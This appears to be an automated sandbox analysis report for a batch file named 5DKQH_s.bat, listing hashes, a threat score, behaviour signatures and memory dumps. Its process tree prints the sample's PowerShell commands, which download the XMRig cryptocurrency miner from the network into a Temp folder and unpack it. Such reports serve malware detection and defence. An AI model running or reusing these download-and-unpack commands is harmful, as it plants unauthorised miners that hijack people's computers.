Overview

overview

10

Static

static

10

5DKQH_s.bat

windows7-x64

8

5DKQH_s.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    21-12-2024 15:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    5DKQH_s.bat

  • Size

    1KB

  • MD5

    ccc7afd46efac5aca2f96dc6c6d757b5

  • SHA1

    981911ae2cf8c85fd9bbb70ea938105617c2aefd

  • SHA256

    35347449c9856b13ee6f4131fc675270c55566881a19cc3d6bc5d2b0709412bb

  • SHA512

    1d336a5827812cd871bdb1459536c5052e4cc50bde82d3e5fd7e474a1488bf55a0763f1d2cac7f6569a2ac6334f066a465cb7b74e52ddbb2d23bd2a31e7b3563

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Powershell Invoke Web Request.

    execution
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\5DKQH_s.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2380
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip -OutFile C:\Users\Admin\AppData\Local\Temp\xmrig-6.22.2-msvc-win64.zip"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2584
    • C:\Windows\system32\timeout.exe
      timeout /t 10
      2⤵
      • Delays execution with timeout.exe
      PID:1980
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Expand-Archive -Path C:\Users\Admin\AppData\Local\Temp\xmrig-6.22.2-msvc-win64.zip -DestinationPath C:\Users\Admin\AppData\Local\Temp\xmrig"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2520

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    39d4fe92aad984540c02622b74808604

    SHA1

    7110ed427b7050e210a883a9ea98da5e12f4cec1

    SHA256

    5a2a8ef2304d8934c27e61c428fc040b5577df57c331a3a3d84cf16a0ab21c95

    SHA512

    c2ec03d1447c9e0ec15e99ada168bcc3853c7c8094862b53ed0e93976af1988cfa889134d091058113e2f4fbaad2b44bf7abcb83209108da866fa4050b7d1cb1

    Download Submit

  • memory/2520-18-0x000000001B200000-0x000000001B4E2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2520-19-0x00000000024A0000-0x00000000024A8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2584-4-0x000007FEF595E000-0x000007FEF595F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2584-5-0x000000001B190000-0x000000001B472000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2584-7-0x000007FEF56A0000-0x000007FEF603D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2584-6-0x0000000001E70000-0x0000000001E78000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2584-8-0x000007FEF56A0000-0x000007FEF603D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2584-9-0x000007FEF56A0000-0x000007FEF603D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2584-10-0x000007FEF56A0000-0x000007FEF603D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2584-11-0x000007FEF56A0000-0x000007FEF603D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2584-12-0x000007FEF56A0000-0x000007FEF603D000-memory.dmp

    Filesize

    9.6MB

    Download